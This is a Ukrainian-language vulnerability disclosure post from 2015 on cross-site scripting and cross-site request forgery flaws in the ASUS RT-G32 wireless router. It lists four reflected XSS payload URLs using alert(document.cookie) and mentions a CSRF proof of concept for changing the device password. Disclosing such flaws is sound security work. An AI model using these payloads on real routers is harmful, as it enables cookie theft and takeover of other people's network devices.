Уразливості в ASUS RT-G32

23:58 28.02.2015

У січні, 28.01.2015, я виявив Cross-Site Scripting та Cross-Site Request Forgery уразливості в ASUS Wireless Router RT-G32. Це перша частина дірок в RT-G32.

Раніше я писав про уразливості в Asus O!Play.

Cross-Site Scripting (WASC-08):

http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

Дані уразливості працюють як через GET, так і через POST.

ASUS RT-G32 XSS-1.html

Cross-Site Request Forgery (WASC-09):

Зміна паролю пристрою:

ASUS RT-G32 CSRF-1.html

Уразливі всі версії ASUS RT-G32. Перевірялося в ASUS RT-G32 з прошивками версій 2.0.2.6 і 2.0.3.2.


Leave a Reply

You must be logged in to post a comment.